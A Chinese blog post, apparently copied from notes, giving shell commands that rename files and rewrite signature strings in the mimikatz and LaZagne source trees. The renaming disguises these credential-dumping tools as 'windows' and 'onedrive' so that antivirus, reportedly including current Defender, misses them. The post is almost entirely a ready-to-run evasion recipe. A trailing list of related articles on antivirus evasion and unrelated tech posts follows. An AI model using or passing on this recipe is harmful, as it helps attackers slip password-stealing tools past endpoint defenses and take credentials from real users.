关于mimikatz lazagne免杀方法
其实现在的杀软还是玩的老一套,改改特征字符就能过了,最新的defender能用这个方法过
文章直接从笔记复制出来的,有需要的自己看情况用
git clone https://github.com/gentilkiwi/mimikatz.git lmmg
mv lmmg/mimikatz lmmg/lmmg
find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";
mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -name '*kiwi*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";
mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -print0 | xargs - sed -i 's/mimikatz/windows/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/MIMIKATZ/WINDOWS/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Mimikatz/Windows/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/DELPY/gweep/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Benjamin/gweeperx/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/benjamin@gentilkiwi.com/@gweeperx/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/creativecommons/notcommons/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/gentilkiwi/MSOffice/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/KIWI/ONEDRIVE/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Kiwi/Onedrive/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/kiwi/onedrive/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/DumpCreds/DumpCred/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/logonPasswords/logonPassword/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/ArgumentPtr/NotTodayPal/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' cd ./lmmg/lmmg/
sed -i "0,/#if \!defined(_POWERKATZ)/! {0,/#if \!defined(_POWERKATZ)/ s/#if \!defined(_POWERKATZ)/\/*\r\n#if \!defined(_POWERKATZ)/}" windows.c
sed -i "0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif\r\n*\//}}" windows.c lazagne
find ./Windows/ -type f -name '*lazagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*lazagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type f -name '*LaZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*LaZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
mv "${FILE}" "${newfile}";
done
find ./Windows/ -type f -name '*laZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*laZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
mv "${FILE}" "${newfile}";
done find windows/ -type f -print0 | xargs - sed -i 's/lazagne/kmm/g'
find windows/ -type f -print0 | xargs - sed -i 's/LaZagne/Kmm/g'
find windows/ -type f -print0 | xargs - sed -i 's/laZagne/KMm/g' find windows/ -type f -print0 | xargs - sed -i 's/BANG/bg/g'
find windows/ -type f -print0 | xargs - sed -i 's/passwords ---------------/vp/g'
find windows/ -type f -print0 | xargs - sed -i 's/Password not found/nop/g'
find windows/ -type f -print0 | xargs - sed -i 's/=================================================================/ll/g'
find windows/ -type f -print0 | xargs - sed -i 's/########## User/lp/g'
find windows/ -type f -print0 | xargs - sed -i 's/For more information launch it again with the -v option/jj/g'
关于mimikatz lazagne免杀方法的更多相关文章
- Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结
Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...
- lcx源代码以及免杀的研究
之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软.顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下. 报毒情况 因为使用 ...
- 2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践
实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcod ...
- 2018-2019-2 网络对抗技术 20165323 Exp3 免杀原理与实践
一.实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应用各种技术实现恶意代码免杀 ( ...
- 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践
2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...
- 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...
- 2018-2019-2 网络对抗技术 20165236 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165236 Exp3 免杀原理与实践 一.实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5 ...
- NetSec2019 20165327 Exp3 免杀原理与实践
NetSec2019 20165327 Exp3 免杀原理与实践 pre基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清 ...
- 2018-2019-2 网络对抗技术 20165326 Exp3 免杀原理与实践
免杀原理与实践 目录 知识点问答 实践内容 遇到的问题 心得体会 知识点 meterpreter免杀 基础问题回答 杀软是如何检测出恶意代码的? 特征码(基于签名):模式匹配,比对特征码库 启发式:通 ...
随机推荐
- Spring Boot 2.X(六):Spring Boot 集成Redis
Redis 简介 什么是 Redis Redis 是目前使用的非常广泛的免费开源内存数据库,是一个高性能的 key-value 数据库. Redis 与其他 key-value 缓存(如 Memcac ...
- LitePal的存储操作
传统的存储数据方式 其实最传统的存储数据方式肯定是通过SQL语句拼接字符串来进行存储的,不过这种方式有点过于“传统”了,今天我们在这里就不讨论这种情况.实际上,Android专门提供了一种用于存储 ...
- spring boot通过Spring Data Redis集成redis
在spring boot中,默认集成的redis是Spring Data Redis,Spring Data Redis针对redis提供了非常方便的操作模版RedisTemplate idea中新建 ...
- SQL SERVER 日志如何进行收缩?
最近经历了一次服务器SQL SERVER 数据库服务器端事务日志爆满,导致服务器数据库写入不进数据的宕机事件,经过此次事件的发生,奉劝各位同仁一句,如果没有绝对的充足存储空间,数据库事务日志文 ...
- Go语言及Beego框架环境搭建
在开始环境搭建之前,我们先一起来看看: Go有什么优势: 不用虚拟机,它可直接编译成机器码,除了glibc外没有其他外部依赖,部署十分方便,就是扔一个文件就完成了. 天生支持并发,可以充分的利用多核, ...
- .Net Core3.0使用gRPC
gRPC是什么 gRPC是可以在任何环境中运行的现代开源高性能RPC框架.它可以通过可插拔的支持来有效地连接数据中心内和跨数据中心的服务,以实现负载平衡,跟踪,运行状况检查和身份验证.它也适用于分布式 ...
- scipy.misc.toimage()出现toimage报错
scipy.misc.toimage()出现toimage报错 自己被这个问题困扰了许久,其实最后发现其实toimage这个函数已经被取消了,或者说是没有这个函数了.有了新得函数与之代替,那就是Ima ...
- Web前端助手-功能丰富的Chrome插件
整合优秀的前端实用工具.免费,可配置的强大工具集 示例 安装 github仓库: https://github.com/zxlie/FeHelper 官网地址:https://www.baidufe. ...
- 渗透-N种反弹shell方法
简介 reverse shell反弹shell或者说反向shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与teln ...
- ASP.NET Core在 .NET Core 3.1 Preview 1中的更新
.NET Core 3.1 Preview 1现在可用.此版本主要侧重于错误修复,但同时也包含一些新功能. 这是此版本的ASP.NET Core的新增功能: 对Razor components的部分类 ...